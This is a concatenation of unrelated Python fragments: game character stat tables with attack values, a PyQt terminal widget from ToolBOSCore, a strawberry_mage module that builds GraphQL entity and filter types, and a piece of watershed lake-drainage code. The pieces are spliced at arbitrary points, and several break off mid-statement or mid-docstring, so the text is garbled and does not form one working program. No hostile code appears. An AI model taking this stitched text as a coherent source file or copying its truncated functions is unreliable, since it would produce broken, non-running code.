'sd': {'name': TTLocalizer.SuitSpinDoctor, 'singularname': TTLocalizer.SuitSpinDoctorS,
'pluralname': TTLocalizer.SuitSpinDoctorP,
'level': 5,
'hp': (56, 72, 90, 110, 132),
'def': (25, 30, 35, 40, 45),
'freq': (50, 30, 10, 5, 5),
'acc': (35, 40, 45, 50, 55),
'attacks': (
(
'ParadigmShift',
(9, 10, 13, 16, 17),
(60, 75, 80, 85, 90),
(30, 30, 30, 30, 30)),
(
'Quake',
(8, 10, 12, 14, 16),
(60, 65, 70, 75, 80),
(20, 20, 20, 20, 20)),
(
'Spin',
(10, 12, 15, 18, 20),
(70, 75, 80, 85, 90),
(35, 35, 35, 35, 35)),
(
'WriteOff',
(6, 7, 8, 9, 10),
(60, 65, 75, 85, 90),
(15, 15, 15, 15, 15)))},
'le': {'name': TTLocalizer.SuitLegalEagle, 'singularname': TTLocalizer.SuitLegalEagleS,
'pluralname': TTLocalizer.SuitLegalEagleP,
'level': 6,
'hp': (72, 90, 110, 132, 156),
'def': (30, 35, 40, 45, 50),
'freq': (50, 30, 10, 5, 5),
'acc': (35, 40, 45, 50, 55),
'attacks': (
(
'EvilEye',
(10, 11, 13, 15, 16),
(60, 75, 80, 85, 90),
(20, 20, 20, 20, 20)),
(
'Jargon',
(7, 9, 11, 13, 15),
(60, 70, 75, 80, 90),
(15, 15, 15, 15, 15)),
(
'Legalese',
(11, 13, 16, 19, 21),
(55, 65, 75, 85, 95),
(35, 35, 35, 35, 35)),
(
'PeckingOrder',
(12, 15, 17, 19, 22),
(70, 75, 80, 85, 95),
(30, 30, 30, 30, 30)))},
'bw': {'name': TTLocalizer.SuitBigWig, 'singularname': TTLocalizer.SuitBigWigS,
'pluralname': TTLocalizer.SuitBigWigP,
'level': 7,
'hp': (90, 110, 132, 156, 200, 462, 992, 1722, 2652),
'def': (35, 40, 45, 50, 55, 60, 65, 70, 70),
'freq': (50, 30, 10, 5, 5, 0, 0, 0, 0),
'acc': (35, 40, 45, 50, 55, 60, 65, 70, 70),
'attacks': (
(
'PowerTrip',
(10, 11, 13, 15, 16, 18, 20, 22, 24),
(75, 80, 85, 90, 95, 95, 95, 95, 95),
(50, 50, 50, 50, 50, 50, 50, 50, 50)),
(
'FingerWag',
(13, 15, 17, 19, 21, 22, 23, 24, 25),
(80, 85, 85, 85, 90, 90, 90, 90, 95),
(50, 50, 50, 50, 50, 50, 50, 50, 50)))},
'sa': {'name': TTLocalizer.SuitSwagAttorney, 'singularname': TTLocalizer.SuitSwagAttorneyS,
'pluralname': TTLocalizer.SuitSwagAttorneyP,
'level': 49,
'hp': (2652, 2652, 2652, 2652, 2562),
'def': (35, 35, 35, 35, 35),
'freq': (100, 0, 0, 0, 0),
'acc': (85, 85, 85, 85, 85),
'attacks': (
(
'Shake',
(25, 25, 25, 25, 25),
(75, 75, 75, 75, 75),
(15, 15, 15, 15, 15)),
(
'RedTape',
(27, 27, 27, 27, 27),
(75, 75, 75, 75, 75),
(30, 30, 30, 30, 30)),
(
'Rolodex',
(25, 25, 25, 25, 25),
(75, 75, 75, 75, 75),
(20, 20, 20, 20, 20)),
(
'Objection',
(30, 30, 30, 30, 30),
(75, 75, 75, 75, 75),
(35, 35, 35, 35, 35)))},
'm1': {'name': TTLocalizer.SuitM1, 'singularname': TTLocalizer.SuitM1S,
'pluralname': TTLocalizer.SuitM1P,
'level': 0,
'hp': (12, 24, 40, 60, 82),
'def': (2, 5, 10, 12, 15),
'freq': (50, 30, 10, 5, 5),
'acc': (35, 40, 45, 50, 55),
'attacks': (
(
'RubberStamp',
(4, 6, 8, 10, 15),
(75, 80, 85, 90, 95),
(20, 20, 20, 20, 20)),
(
'Shred',
(5, 10, 15, 20, 25),
(50, 55, 60, 65, 70),
(20, 20, 20, 20, 20)),
(
'GlowerPower',
(4, 6, 8, 10, 14),
(95, 95, 95, 95, 95),
(10, 10, 10, 10, 10)),
(
'ParadigmShift',
(8, 10, 15, 18, 20),
(95, 95, 95, 95, 95),
(10, 10, 10, 10, 10)),
(
'PickPocket',
(4, 4, 6, 6, 10),
(25, 30, 35, 40, 45),
(50, 50, 50, 50, 50)))},
'm2': {'name': TTLocalizer.SuitM2, 'singularname': TTLocalizer.SuitM2S,
'pluralname': TTLocalizer.SuitM2P,
'level': 1,
'hp': (24, 40, 60, 84, 112),
'def': (5, 10, 15, 20, 25),
'freq': (50, 30, 10, 5, 5),
'acc': (45, 50, 55, 60, 65),
'attacks': (
(
'Fired',
(4, 6, 8, 12, 16),
(75, 75, 75, 75, 75),
(10, 10, 10, 10, 10)),
(
'RedTape',
(6, 12, 15, 18, 22),
(75, 75, 75, 75, 75),
(10, 10, 10, 10, 10)),
(
'Withdrawal',
(15, 18, 20, 24, 28),
(95, 95, 95, 95, 95),
(10, 10, 10, 10, 10)),
(
'ReOrg',
(16, 18, 23, 26, 30),
(95, 95, 95, 95, 95),
(10, 10, 10, 10, 10)),
(
'FillWithLead',
(10, 12, 14, 16, 18),
(95, 95, 95, 95, 95),
(35, 35, 35, 35, 35)),
(
'Liquidate',
(5, 5, 5, 5, 20),
(50, 60, 70, 80, 90),
(25, 25, 25, 25, 25)))},
'm3': {'name': TTLocalizer.SuitM3, 'singularname': TTLocalizer.SuitM3S,
'pluralname': TTLocalizer.SuitM3P,
'level': 2,
'hp': (40, 60, 84, 112, 144),
'def': (10, 15, 20, 25, 30),
'freq': (50, 30, 10, 5, 5),
'acc': (65, 70, 75, 80, 85),
'attacks': (
(
'PickPocket',
(5, 6, 7, 8, 15),
(50, 60, 70, 80, 90),
(20, 20, 20, 20, 20)),
(
'BounceCheck',
(5, 6, 7, 8, 17),
(50, 60, 70, 80, 90),
(15, 15, 15, 15, 15)),
(
'BuzzWord',
(5, 6, 7, 8, 13),
(50, 60, 70, 80, 90),
(20, 20, 20, 20, 20)),
(
'Schmooze',
(5, 6, 7, 8, 18),
(50, 60, 70, 80, 90),
(25, 25, 25, 25, 25)),
(
'MumboJumbo',
(5, 6, 7, 8, 20),
(50, 60, 70, 80, 90),
(20, 20, 20, 20, 20)))},
'm4': {'name': TTLocalizer.SuitM4, 'singularname': TTLocalizer.SuitM4S,
'pluralname': TTLocalizer.SuitM4P,
'level': 3,
'hp': (60, 84, 112, 144, 180),
'def': (15, 20, 25, 30, 35),
'freq': (50, 30, 10, 5, 5),
'acc': (65, 70, 75, 80, 85),
'attacks': (
(
'HangUp',
(14, 17, 19, 20, 23),
(75, 75, 75, 75, 75),
(15, 15, 15, 15, 15)),
(
'GuiltTrip',
(16, 19, 20, 21, 23),
(75, | |
<reponame>manuelmuehlig/ToolBOSCore<filename>include/ToolBOSCore/GenericGUI/TerminalWidget.py
# -*- coding: utf-8 -*-
#
# Terminal for remote process execution monitoring
#
# Copyright (c) Honda Research Institute Europe GmbH
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#
import logging
import os
from PyQt5.QtCore import pyqtSignal, Qt, QProcess, QRegularExpression
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from ToolBOSCore.GenericGUI import IconProvider, ProcessExecutor, UnicodeSupport
from ToolBOSCore.Util import Any
lightBlue = QColor( 210, 230, 255 )
lightGreen = QColor( 210, 255, 210 )
lightGrey = QColor( 240, 240, 240 )
lightOrange = QColor( 255, 200, 100 )
lightYellow = QColor( 255, 248, 220 )
lightRed = QColor( 255, 120, 120 )
solidRed = QColor( 255, 0, 0 )
# noinspection PyArgumentList,PyUnresolvedReferences
class TerminalWidget( QWidget, object ):
"""
Contains a QTextEdit (with domain-specific context menu) and a
QLabel indicating the current working directory.
"""
closeRequest = pyqtSignal()
hostChanged = pyqtSignal( str )
terminateAllProcesses = pyqtSignal()
def __init__( self, readonly, inactiveColor=lightGrey,
runColor=lightYellow, exitSuccessColor=lightGreen,
exitFailureColor=lightRed, warningHighlightColor=lightOrange,
errorHighlightColor=solidRed, parent=None ):
Any.requireIsBool( readonly )
Any.requireIsInstance( inactiveColor, QColor )
Any.requireIsInstance( runColor, QColor )
Any.requireIsInstance( exitSuccessColor, QColor )
Any.requireIsInstance( exitFailureColor, QColor )
Any.requireIsInstance( warningHighlightColor, QColor )
Any.requireIsInstance( errorHighlightColor, QColor )
super( QWidget, self ).__init__()
self.command = ''
self.hostname = 'localhost'
self.homeDir = os.path.expanduser( '~' )
self.path = os.getcwd()
self.pipe = None
self.standalone = False
self.taskProcess = None
self.withX11Tunnel = False
self._loggingEnabled = False
self._logFilename = ''
self._logFile = None
self.depChecker = None
self._missingDeps = []
self._closeAction = None
self._enabled = False
self._execCommand = None
self._showCommand = None
self._oldPath = self.path
self._oldColor = None
self._oldWinFlags = None
self._outputFilter = None
self._terminating = False
self._inactiveColor = inactiveColor
self._runColor = runColor
self._exitSuccessColor = exitSuccessColor
self._exitFailureColor = exitFailureColor
self._warningHighlightColor = warningHighlightColor
self._errorHighlightColor = errorHighlightColor
self._defaultFont = QFont( 'Arial', 8 )
self.hostnameField = QLineEdit( parent )
self.hostnameField.setFont( self._defaultFont )
self.hostnameField.setToolTip( 'hostname' )
self.hostnameField.setText( self.hostname )
self.hostnameField.setReadOnly( readonly )
# noinspection PyUnresolvedReferences
self.hostnameField.editingFinished.connect( self._onHostnameFieldInput )
self.sepLabel = QLabel( ':', parent )
self.pathField = QLineEdit( parent )
self.pathField.setFont( self._defaultFont )
self.pathField.setToolTip( 'working directory (to change it type "cd ..." in operator shell below)' )
self.pathField.setText( self.path )
# noinspection PyUnresolvedReferences
self.pathField.editingFinished.connect( self._onPathFieldInput )
self.problemIndicator = QPushButton()
self.problemIndicator.hide()
self.xtermButton = QPushButton()
self.xtermButton.setIcon( IconProvider.getIcon( 'utilities-terminal' ) )
self.xtermButton.setToolTip( 'open xterm' )
# search bar
self.searchBar = QLineEdit( parent )
self.searchBar.setFont( self._defaultFont )
self.searchBar.setToolTip( 'search' )
# noinspection PyUnresolvedReferences
self.searchBar.textChanged.connect( self._onSearchBarFieldInput )
self.searchBarLabel = QLabel( 'Search...', parent )
self.searchBarLabel.setFont( self._defaultFont )
# noinspection PyUnresolvedReferences
self.xtermButton.pressed.connect( self._onXtermButton )
self.hLayout = QHBoxLayout()
self.hLayout.setContentsMargins( 0, 0, 0, 0 )
self.hLayout.addWidget( self.hostnameField )
self.hLayout.addWidget( self.sepLabel )
self.hLayout.addWidget( self.pathField )
self.hLayout.addWidget( self.problemIndicator )
self.hLayout.addWidget( self.xtermButton )
self.hLayout.setStretchFactor( self.pathField, 2 )
self.locationWidget = QWidget( parent )
self.locationWidget.setLayout( self.hLayout )
self.hFooterLayout = QHBoxLayout()
self.hFooterLayout.setContentsMargins( 0, 0, 0, 0 )
self.hFooterLayout.addWidget( self.searchBarLabel )
self.hFooterLayout.addWidget( self.searchBar )
self.hFooterLayout.setStretchFactor( self.searchBar, 2 )
self.footerWidget = QWidget( parent )
self.footerWidget.setLayout( self.hFooterLayout )
self.footerWidget.setHidden( True )
self.textField = self._TerminalTextEdit( warningColor=warningHighlightColor,
errorColor=errorHighlightColor,
parent=parent )
self.textField.setColor( self._inactiveColor )
self.textField.closeRequest.connect( self.closeRequest.emit )
self.textField.reRunProcess.connect( self._reRun )
self.textField.terminateThisProcess.connect( self.terminateThis )
self.textField.terminateAllProcesses.connect( self.emitTerminateAll )
self.textField.standaloneRequest.connect( self.toggleStandalone )
self.textField.findRequest.connect( self.toggleSearch )
self.vLayout = QVBoxLayout()
self.vLayout.addWidget( self.locationWidget )
self.vLayout.addWidget( self.textField )
self.vLayout.addWidget( self.footerWidget )
self.setLayout( self.vLayout )
def isSearchBarVisibile( self ):
return self.footerWidget.isVisible()
def searchBarVisibility( self, state ):
Any.requireIsBool( state )
self.footerWidget.setHidden( not state )
def clear( self ):
self.textField.clear()
self.textField.setColor( self._inactiveColor )
if self._logFile:
self._logFile.close()
self._logFile = None
def closeEvent( self, event ):
# in case the user closes the window: don't do that, instead put the
# widget again into the grid-view
event.ignore()
self.toggleStandalone()
def emitTerminateAll( self ):
self._terminating = True
self.terminateAllProcesses.emit()
def isEnabled( self ):
return self._enabled
def kill( self ):
try:
logging.debug( 'terminating process %d', self.pipe.pid )
self.pipe.kill()
except ( AttributeError, OSError ): # no such pipe, or terminated
pass
def run( self ):
self._terminating = False
self.writeCommand( self._showCommand )
self.textField.setColor( self._runColor )
self.taskProcess.start()
def setColor( self, color ):
Any.requireIsInstance( color, QColor )
self.textField.setColor( color )
def setCommand( self, command, showCommand=None ):
"""
In certain cases the actual 'command' which shall be executed
should not be visible to the user in this form.
You may specify an alternative 'showCommand'.
"""
Any.requireIsTextNonEmpty( command )
self.command = command
if not showCommand:
self._showCommand = command
else:
self._showCommand = showCommand
def setEnabled( self, enabled ):
"""
The difference to setReadOnly() is the following:
Use setEnabled() to mark a terminal as active or not.
A disabled widget cannot be used and is shown with lightgrey
shadow.
In contrast, a terminal should be marked readonly during a
program execution, f.i. the user cannot change values within
this time.
"""
self.setReadOnly( not enabled )
self.textField.setEnabled( enabled )
self.pathField.setEnabled( enabled )
if self._enabled != enabled:
# do color store / restore only if state changes, skip in case it
# was already in the desired state (which would lead to problems
# in color management)
if enabled:
# restore color if was not inactive == freshly created
if self._oldColor is not None and \
self._oldColor is not self._inactiveColor:
self.textField.setColor( self._oldColor )
else:
# store original color for later restore
# when disabling a terminal, store its original color for
# later restore
self._oldColor = self.textField.getColor()
self.textField.setColor( self._inactiveColor )
self._enabled = enabled
def setHaveTerminateAll( self, status ):
Any.requireIsBool( status )
self.textField.setHaveTerminateAll( status )
def setHostname( self, hostname ):
Any.requireIsTextNonEmpty( hostname )
self.hostname = hostname
logging.debug( "changed hostname to '%s'", self.hostname )
self._updateLabel()
def setReadOnly( self, readOnly ):
"""
The difference to setEnabled() is the following:
Use setEnabled() to mark a terminal as active or not.
A disabled widget cannot be used and is shown with lightgrey
shadow.
In contrast, a terminal should be marked readonly during a
program execution, f.i. the user cannot change values within
this time.
"""
enabled = not readOnly
self.hostnameField.setEnabled( enabled )
self.pathField.setEnabled( enabled ) # not implemented, yet
def setPath( self, path ):
if not path:
path = '~' # fallback to homedir.
# compute new absolute path, resolve ".", ".." or symlinks
path = os.path.expanduser( path )
if os.path.isabs( path ):
path = os.path.abspath( path )
else:
path = os.path.abspath( os.path.join( self.path, path ) )
self.path = path
self._updateLabel()
self.writeText( '%s\n' % self.path )
def setOutputFilter( self, func ):
"""
Callback to be invoked before printing the command output to the
terminal widget. Could be used to perform some textual
replacements before displaying.
The function will receive the original output as text parameter
and is supposed to return the modified text.
Use None to disable output filtering (= display original output).
"""
if func is not None:
Any.requireIsCallable( func )
self._outputFilter = func
def setTerminateAll( self, status ):
Any.requireIsBool( status )
self._haveTerminateAll = status
def setToolTip( self, toolTipText ):
Any.requireIsTextNonEmpty( toolTipText )
self.textField.setToolTip( toolTipText )
def setWithX11Tunnel( self, withX11 ):
"""
Use SSH's X11 forwarding when executing commands on | |
"""Module for creating strawberry types for entity models."""
import dataclasses
import enum
import sys
from inspect import isclass
from typing import Any, Dict, ForwardRef, List, Optional, Tuple, Type, Union, cast
import strawberry
from strawberry.annotation import StrawberryAnnotation
from strawberry.arguments import UNSET
from strawberry.field import StrawberryField
from strawberry.schema.types.scalar import DEFAULT_SCALAR_REGISTRY
from strawberry.type import StrawberryType
from strawberry.utils.typing import is_list, is_optional
from strawberry_mage.core.strawberry_types import (
EntityType,
ObjectFilter,
ObjectOrdering,
OrderingDirection,
PrimaryKeyInput,
QueryMany,
QueryManyResult,
QueryOne,
ROOT_NS,
SCALAR_FILTERS,
ScalarFilter,
StrawberryModelInputTypes,
)
from strawberry_mage.core.types import (
GraphQLOperation,
IEntityModel,
ModuleBoundStrawberryAnnotation,
)
if sys.version_info >= (3, 10):
from types import NoneType
else:
NoneType = type(None)
SCALARS = list(DEFAULT_SCALAR_REGISTRY.keys())
class GeneratedType(enum.Enum):
"""Type of a generated entity."""
ENTITY = ""
PRIMARY_KEY_INPUT = "PrimaryKey"
PRIMARY_KEY_FIELD = "PrimaryKeyField"
QUERY_ONE = "QueryOne"
QUERY_MANY = "QueryMany"
QUERY_MANY_INPUT = "QueryManyInput"
CREATE_ONE = "CreateOne"
CREATE_MANY = "CreateMany"
UPDATE_ONE = "UpdateOne"
UPDATE_MANY = "UpdateMany"
DELETE_ONE = "DeleteOne"
DELETE_MANY = "DeleteMany"
INPUTS = "Inputs"
FILTER = "Filter"
ORDERING = "Ordering"
POLYMORPHIC_BASE = "_"
def get_typename(self: "GeneratedType", name: str):
"""
Convert a name to a GeneratedType name based on the enum value.
:param name: name to convert
:return: converted name
"""
return name + self.value
@staticmethod
def get_original(name: str):
"""
Attempt to get the original entity name from a GeneratedType name.
:param name: a name
:return: the original one or name if not matched
"""
for type_ in GeneratedType:
if type_ != GeneratedType.ENTITY and name.endswith(type_.value):
return name.rstrip(type_.value)
return name
def _create_fields(fields: Dict[str, Any], target_type: GeneratedType = GeneratedType.ENTITY) -> Dict[str, Any]:
strawberry_fields = {
f: StrawberryField(
f,
type_annotation=defer_annotation(a, target_type),
default_factory=lambda: UNSET,
default=UNSET,
)
for f, a in fields.items()
}
return {
**strawberry_fields,
"__annotations__": {f: a.type_annotation for f, a in strawberry_fields.items()},
}
def strip_typename(type_: Union[str, Type]) -> Union[str, Type]:
"""
Return cleaned up typename of a class for a type annotation.
:param type_: type annotation to clean
:return: name of the resulting type (to use as ForwardRef)
"""
while hasattr(type_, "__args__"):
type_ = getattr(type_, "__args__")[0]
if isinstance(type_, str):
return type_
if isinstance(type_, ForwardRef):
return type_.__forward_arg__
if type_ in SCALARS:
return type_
return type_
def strip_defer_typename(type_: Union[str, Type]) -> Union[str, Type]:
"""
Return cleaned up and defered typename of a class for a type annotation.
:param type_: type annotation to clean
:return: name of the resulting type (to use as ForwardRef)
"""
type_ = strip_typename(type_)
if type_ in SCALARS:
return type_
return type_
def _apply_type_rename(name: str, target_type: GeneratedType):
if not any((t != GeneratedType.ENTITY and name.endswith(t.value) for t in GeneratedType)):
return target_type.get_typename(name)
return name
def defer_annotation(
annotation, target_type: GeneratedType = GeneratedType.ENTITY
) -> Union[Type, ModuleBoundStrawberryAnnotation]:
"""
Defer the resolution of an annotation (using ForwardRef-s).
:param annotation: annotation to defer
:param target_type: type to create the annotation for
:return:
"""
if annotation is NoneType:
return annotation
if isinstance(annotation, ForwardRef):
return defer_annotation(annotation.__forward_arg__, target_type)
if isinstance(annotation, str):
return ModuleBoundStrawberryAnnotation(_apply_type_rename(annotation, target_type))
if isclass(annotation):
if issubclass(annotation, ScalarFilter) or annotation in SCALARS:
return annotation
if dataclasses.is_dataclass(annotation) or (
issubclass(annotation, enum.Enum) and target_type in {GeneratedType.FILTER, GeneratedType.ORDERING}
):
return ModuleBoundStrawberryAnnotation(_apply_type_rename(annotation.__name__, target_type))
if isinstance(annotation, ModuleBoundStrawberryAnnotation):
return defer_annotation(annotation.annotation, target_type)
if hasattr(annotation, "__args__"):
deferred_args = [defer_annotation(arg, target_type) for arg in getattr(annotation, "__args__")]
# TODO: UGLY
new_annotation = ModuleBoundStrawberryAnnotation(
annotation.__reduce__()[1][0][ # type: ignore
(*(a.annotation if isinstance(a, StrawberryAnnotation) else a for a in deferred_args),)
]
)
return new_annotation
return annotation
def create_enum_type(attr: Type[enum.Enum]):
"""
Create strawberry enum from a python enum.
:param attr: enum class
:return: strawberry enum, enum filtering and enum ordering
"""
enum_type = strawberry.enum(attr) # type: ignore
enum_filter_type = strawberry.input(
type(
GeneratedType.FILTER.get_typename(attr.__name__),
(),
_create_fields(
{
"exact": enum_type,
}
),
)
)
values = [e.name for e in attr]
enum_ordering_type = strawberry.input(
type(
GeneratedType.ORDERING.get_typename(attr.__name__),
(),
_create_fields({k: OrderingDirection for k in values}),
)
)
setattr(sys.modules[ROOT_NS], enum_type.__name__, enum_type)
enum_type.__module__ = ROOT_NS
setattr(sys.modules[ROOT_NS], enum_filter_type.__name__, enum_filter_type)
enum_filter_type.__module__ = ROOT_NS
setattr(sys.modules[ROOT_NS], enum_ordering_type.__name__, enum_ordering_type)
enum_ordering_type.__module__ = ROOT_NS
return enum_type, enum_filter_type, enum_ordering_type
def create_entity_type(model: Type[IEntityModel]) -> Tuple[Type[EntityType], Type[EntityType]]:
"""
Create an entity type.
:param model: class to create entity type for
:return: entity type
"""
attrs = model.get_attribute_types()
for name in attrs.keys():
attr = strip_typename(attrs[name])
if isclass(attr) and isinstance(attr, type(enum.Enum)):
enum_type, _, _ = create_enum_type(cast(Type[enum.Enum], attr))
attrs[name] = enum_type
children = model.get_children_class_names()
parent_name = model.get_parent_class_name()
entity = None
base_name = GeneratedType.ENTITY.get_typename(model.__name__)
if children:
python_entity = type(
GeneratedType.ENTITY.get_typename(model.__name__),
(EntityType,),
_create_fields(attrs),
)
entity = strawberry.interface(python_entity)
setattr(sys.modules[ROOT_NS], entity.__name__, entity)
entity.__module__ = ROOT_NS
base_name = GeneratedType.POLYMORPHIC_BASE.get_typename(parent_name if parent_name else entity.__name__)
parent_cls = (
EntityType
if parent_name is None
else ModuleBoundStrawberryAnnotation(GeneratedType.ENTITY.get_typename(parent_name)).resolve()
)
if isinstance(parent_cls, StrawberryType):
raise TypeError(f"Invalid parent type {parent_cls}")
python_base_entity = type(base_name, (parent_cls,), _create_fields(attrs))
base_entity = cast(Type[EntityType], strawberry.type(python_base_entity))
setattr(sys.modules[ROOT_NS], base_entity.__name__, base_entity)
base_entity.__module__ = ROOT_NS
def is_type_of(other, *_):
return other.__class__.__name__ == model.__name__
getattr(base_entity, "_type_definition").is_type_of = is_type_of
if entity is None:
entity = base_entity
return base_entity, cast(Type[EntityType], entity)
def create_input_types(model: Type[IEntityModel]) -> Type:
"""
Create all input types of an entity.
:param model: class to use
:return: all input types
"""
fields = _create_fields(
{
"primary_key_input": create_primary_key_input(model),
"primary_key_field": create_primary_key_field(model),
"query_one_input": create_query_one_input(model),
"query_many_input": create_query_many_input(model),
"create_one_input": create_create_one_input(model),
"update_one_input": create_update_one_input(model),
}
)
del fields["__annotations__"]
input_types = dataclasses.make_dataclass(
GeneratedType.INPUTS.get_typename(model.__name__),
[(f.name, f.type) for f in fields.values()],
bases=(StrawberryModelInputTypes,),
)
setattr(sys.modules[ROOT_NS], input_types.__name__, input_types)
input_types.__module__ = ROOT_NS
return input_types
def create_ordering_input(model: Type[IEntityModel]) -> Type[ObjectOrdering]:
"""
Create input type for ordering entities.
:param model: class to order
:return: ordering input type
"""
python_type = type(
GeneratedType.ORDERING.get_typename(model.__name__),
(ObjectOrdering,),
_create_fields(
{
k: get_ordering_type(Optional[model.get_attribute_type(k)]) # type: ignore
for k in model.get_attributes(GraphQLOperation.QUERY_MANY)
}
),
)
ordering = strawberry.input(python_type)
setattr(sys.modules[ROOT_NS], ordering.__name__, ordering)
ordering.__module__ = ROOT_NS
return ordering
def create_filter_input(model: Type[IEntityModel]) -> Type[ObjectFilter]:
"""
Create input type for filtering entities.
:param model: class to filter
:return: filter input type
"""
python_type = type(
GeneratedType.FILTER.get_typename(model.__name__),
(ObjectFilter,),
_create_fields(
{
"AND_": Optional[List[Optional[GeneratedType.FILTER.get_typename(model.__name__)]]], # type: ignore
"OR_": Optional[List[Optional[GeneratedType.FILTER.get_typename(model.__name__)]]], # type: ignore
**{
k: get_filter_type(Optional[model.get_attribute_type(k)]) # type: ignore
for k in model.get_attributes(GraphQLOperation.QUERY_MANY)
},
}
),
)
filter_ = strawberry.input(python_type)
setattr(sys.modules[ROOT_NS], filter_.__name__, filter_)
filter_.__module__ = ROOT_NS
return filter_
def create_primary_key_input(model: Type[IEntityModel]) -> type:
"""
Create input type for a primary key of an entity.
:param model: class of which primary key should be used
:return: primary key input type
"""
input_type = strawberry.input(
type(
GeneratedType.PRIMARY_KEY_INPUT.get_typename(model.__name__),
(PrimaryKeyInput,),
_create_fields({k: model.get_attribute_type(k) for k in model.get_primary_key()}),
)
)
setattr(sys.modules[ROOT_NS], input_type.__name__, input_type)
input_type.__module__ = ROOT_NS
return input_type
def create_primary_key_field(model: Type[IEntityModel]) -> Type:
"""
Create input field for a primary key of an entity.
this effectively wraps the primary_key_input
:param model: class of which primary key should be used
:return: primary key field
"""
pk_field = strawberry.input(
type(
GeneratedType.PRIMARY_KEY_FIELD.get_typename(model.__name__),
(EntityType,),
_create_fields(
{
"primary_key_": GeneratedType.PRIMARY_KEY_INPUT.get_typename(model.__name__),
},
GeneratedType.PRIMARY_KEY_FIELD,
),
)
)
setattr(sys.modules[ROOT_NS], pk_field.__name__, pk_field)
pk_field.__module__ = ROOT_NS
return pk_field
def create_query_one_input(model: Type[IEntityModel]) -> type:
"""
Create input type for retrieving an entity.
:param model: class to be queried
:return: query-one type
"""
query_one = strawberry.input(
type(
GeneratedType.QUERY_ONE.get_typename(model.__name__),
(QueryOne,),
_create_fields({"primary_key_": GeneratedType.PRIMARY_KEY_INPUT.get_typename(model.__name__)}),
)
)
setattr(sys.modules[ROOT_NS], query_one.__name__, query_one)
query_one.__module__ = ROOT_NS
return query_one
def create_query_many_input(model: Type[IEntityModel]) -> type:
"""
Create input type for querying list of entities.
:param model: class to be queried
:return: query-many type
"""
query_many = strawberry.input(
type(
GeneratedType.QUERY_MANY_INPUT.get_typename(model.__name__),
(QueryMany,),
_create_fields(
{
"ordering": Optional[
List[Optional[GeneratedType.ORDERING.get_typename(model.__name__)]] # type: ignore
],
"filters": Optional[
List[Optional[GeneratedType.FILTER.get_typename(model.__name__)]] # type: ignore
],
}
),
)
)
setattr(sys.modules[ROOT_NS], query_many.__name__, query_many)
query_many.__module__ = ROOT_NS
return query_many
def create_create_one_input(model: Type[IEntityModel]) -> type:
"""
Create input type for creating one entity.
:param model: class to be created
:return: input type
"""
fields = {f: model.get_attribute_type(f) for f in model.get_attributes(GraphQLOperation.CREATE_ONE)}
create_one = strawberry.input(
type(
GeneratedType.CREATE_ONE.get_typename(model.__name__),
(EntityType,),
_create_fields(fields, GeneratedType.PRIMARY_KEY_FIELD),
)
)
setattr(sys.modules[ROOT_NS], create_one.__name__, create_one)
create_one.__module__ = ROOT_NS
return create_one
def create_update_one_input(model: Type[IEntityModel]) -> type:
"""
Create input type for updating one entity.
:param model: class to be updated
:return: input type
"""
update_one = strawberry.input(
type(
GeneratedType.UPDATE_ONE.get_typename(model.__name__),
(EntityType,),
_create_fields(
{
"primary_key_": GeneratedType.PRIMARY_KEY_INPUT.get_typename(model.__name__),
**{
f: Optional[model.get_attribute_type(f)] # type: ignore
for f in model.get_attributes(GraphQLOperation.UPDATE_ONE)
},
},
GeneratedType.PRIMARY_KEY_FIELD,
),
)
)
setattr(sys.modules[ROOT_NS], update_one.__name__, update_one)
update_one.__module__ = ROOT_NS
return update_one
def create_query_many_output(model: Type[IEntityModel]) -> Type[QueryManyResult]:
"""
Create query-many output type for listing entities.
:param model: class to be listed
:return: query-many output type
"""
python_type = type(
GeneratedType.QUERY_MANY.get_typename(model.__name__),
(QueryManyResult,),
_create_fields({"results": List[GeneratedType.ENTITY.get_typename(model.__name__)]}), # type: ignore
)
query_many = strawberry.type(python_type, is_input=False)
setattr(sys.modules[ROOT_NS], query_many.__name__, query_many)
query_many.__module__ = ROOT_NS
return cast(Type[QueryManyResult], query_many)
def get_ordering_type(type_: Any):
"""
Convert type to ordering type.
:param type_: type to convert
:return: ordering type
"""
if type_ is NoneType:
raise AttributeError("Should not | |
no drainage field and more than one exit for at least one lake
needDrainage = False
if streamDrainageIndex < 0:
for data in exitData.values():
if len(data) > 1:
needDrainage = True
break
if needDrainage:
self.drainAreas = zeros((maxChLink + 1), dtype=float)
gridCellArea = self.dx * self.dy * gv.gridSize * gv.gridSize
self.setGridDrainageAreas(maxChLink, gridCellArea)
# find outlet with largest drainage and mark as THE outlet
for lakeId, data in exitData.items():
# set maxDrainage less than -1 value used for missing drainage so that first exit link registers
# as if there is only one exit for each lake needDrainage will be false
maxDrainage = -2
exLink = -1
exWsno = -1
exPoint = None
exElev = 0
for chLink, (wsno, drainage, pt, elev) in data.items():
if needDrainage:
drainage = float(self.drainAreas[chLink]) # use float to convert from numpy float
if drainage > maxDrainage:
maxDrainage = drainage
exLink = chLink
exWsno = wsno
exPoint = pt
exElev = elev
if exLink < 0:
